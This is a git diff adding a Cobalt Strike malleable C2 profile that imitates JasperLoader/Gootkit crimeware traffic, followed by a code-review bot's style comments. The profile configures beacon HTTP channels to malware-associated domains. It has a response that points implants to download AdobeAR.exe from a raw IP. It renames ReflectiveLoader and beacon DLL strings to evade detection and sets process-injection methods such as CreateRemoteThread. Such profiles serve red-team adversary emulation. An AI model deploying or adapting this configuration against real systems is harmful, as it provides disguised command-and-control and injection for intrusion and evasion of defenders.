diff --git a/crimeware/jasperloader.profile b/crimeware/jasperloader.profile
new file mode 100644
index 0000000..682d023
--- /dev/null
+++ b/crimeware/jasperloader.profile
@@ -0,0 +1,223 @@
+#jasperloader.profile
+#https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html
+#https://app.any.run/tasks/39e6bd26-b580-4335-89de-69483d745efb/
+#xx0hcd
+
+###global options###
+#sleeptime from report, image 'Figure 22: Stage 2 — JavaScript retrieval'
+set sleeptime "180000";
+set jitter "33";
+set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38";
+
+set sample_name "jasperloader.profile";
+
+http-get {
+
+ set uri "/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php";
+
+ set verb "GET";
+
+ client {
+
+ header "Host" "cdn.zaczvk.pl";
+ header "Connection" "Keep-Alive";
+
+
+ metadata {
+ base64url;
+ parameter "vid";
+ }
+
+ }
+
+ server {
+ header "Server" "nginx/1.14.2";
+ header "Content-Type" "text/html; charset=UTF-8";
+ header "Connection" "keep-alive";
+ header "X-Powered-By" "PHP/5.4.16";
+
+ output {
+
+ netbios;
+
+ prepend "\nfiuyc= \"";
+
+ append "\";\n";
+ append "xfbjixjsytvxjyuvcaxhfehv = new Array();\n";
+ append "xfbjixjsytvxjyuvcaxhfehv.push(\"i95BtfTT\")\n";
+ append "xfbjixjsytvxjyuvcaxhfehv.push(\"C(\")\n";
+ append "xfbjixjsytvxjyuvcaxhfehv.push(\"wVC3Ea\")\n";
+ append "xfbjixjsytvxjyuvcaxhfehv.push(\"93V6x46z\")\n";
+ append "xfbjixjsytvxjyuvcaxhfehv.push(\"9E7txtA6tRS3>SzSt4w\")\n";
+ append "xfbjixjsytvxjyuvcaxhfehv.push(\"Bv9\")\n";
+ append "xfbjixjsytvxjyuvcaxhfehv.push(\"xta7\")\n";
+ append "xfbjixjsytvxjyuvcaxhfehv.push(\"49\")\n";
+
+ print;
+ }
+ }
+}
+
+http-post {
+
+ set uri "/";
+ set verb "GET";
+ #set verb "POST";
+
+ client {
+
+
+ header "Host" "space.bajamelide.ch";
+ header "Connection" "Keep-Alive";
+
+ output {
+ base64url;
+ parameter "b";
+ }
+
+ id {
+ base64url;
+ parameter "v";
+
+ }
+ parameter "psver" "5";
+ }
+
+ server {
+ header "Server" "nginx/1.14.2";
+ header "Content-Type" "text/html; charset=UTF-8";
+ header "Content-Length" "89";
+ header "Connection" "keep-alive";
+ header "X-Powered-By" "PHP/5.4.16";
+
+ output {
+ netbios;
+
+# prepend "\n";
+ prepend "d|http://31.214.157.69/";
+
+ append "|AdobeAR.exe|http://cdn.zaczvk.pl/moddownloadok.php";
+ print;
+ }
+ }
+}
+
+http-stager {
+
+ set uri_x86 "/501";
+ set uri_x64 "/502";
+
+ client {
+ header "Host" "cloud.diminishedvaluecalifornia.com";
+ header "Connection" "Keep-Alive";
+
+ parameter "dwgvhgc" "";
+ }
+
+ server {
+ header "Server" "Apache/2.2.15 (CentOS)";
+ header "Last-Modified" "Tue, 22 Jan 2019 16:31:28 GMT";
+ header "ETag" "9f688-4-5800e82560818";
+ header "Accept-Ranges" "bytes";
+ header "Content-Length" "4";
+ header "Connection" "close";
+ header "Content-Type" "text/html; charset=UTF-8";
+
+ output{
+ prepend "500\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+ print;
+ }
+
+ }
+
+
+}
+
+
+
+
+###Malleable PE Options###
+
+post-ex {
+
+ set spawnto_x86 "%windir%\\syswow64\\wscript.exe";
+ set spawnto_x64 "%windir%\\sysnative\\wscript.exe";
+
+ set obfuscate "false";
+
+ set smartinject "false";
+
+ set amsi_disable "false";
+
+}
+
+#used peclone on sample from 2nd stage gootkit using same domains, https://app.any.run/tasks/39e6bd26-b580-4335-89de-69483d745efb/
+stage {
+ set checksum "0";
+ set compile_time "15 Apr 2015 01:24:00";
+ set entry_point "8208";
+ set image_size_x86 "2560000";
+ set image_size_x64 "2560000";
+ #set name "";
+ set userwx "false";
+ set cleanup "false";
+ set sleep_mask "false";
+ set stomppe "false";
+ set obfuscate "false";
+ set rich_header "";
+
+ set sleep_mask "false";
+
+# set module_x86 "";
+# set module_x64 "";
+
+ transform-x86 {
+ prepend "\x90\x90\x90";
+ strrep "ReflectiveLoader" "6ayBRVW";
+ strrep "beacon.dll" "uVRWRut";
+ }
+
+ transform-x64 {
+ prepend "\x90\x90\x90";
+ strrep "ReflectiveLoader" "6ayBRVW";
+ strrep "beacon.x64.dll" "uVRWRut";
+ }
+
+#can set a string in the .rdata section of the beacon dll.
+ #adds a zero-terminated string
+ #string "something";
+
+ #adds a string 'as-is'
+ #data "something";
+
+ #adds a wide (UTF-16LE encoded) string
+ stringw "IMAGE_SCN_MEM_READ";
+}
+
+
+#controls process injection behavior
+process-inject {
+
+ set allocator "NtMapViewOfSection";
+
+ set min_alloc "16700";
+
+ set userwx "false";
+
+ set startrwx "true";
+
+ transform-x86 {
+ prepend "\x90\x90\x90";
+ }
+ transform-x64 {
+ prepend "\x90\x90\x90";
+ }
+
+ execute {
+ CreateThread "ntdll!RtlUserThreadStart";
+ CreateThread;
+ NtQueueApcThread;
+ CreateRemoteThread;
+ RtlCreateUserThread;
+ }
+}
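Review bot: `set sleep_mask "false";` is assigned twice inside the `stage` block, once in the first run of options and again right after `set rich_header "";`, so the second line is redundant and leaves two copies that can silently drift apart; drop the later one. The `http-post` block keeps a dead `#set verb "POST";` beside the live `set verb "GET";` without saying why GET was kept, whereas the other non-default values cite the report — either remove the stale line or add a short comment such as `#report shows the POST channel using GET, see Figure 22`, hedged if that reading of the source is uncertain. The `output{` in the http-stager server block also lacks the space before `{` that every other block in the file uses.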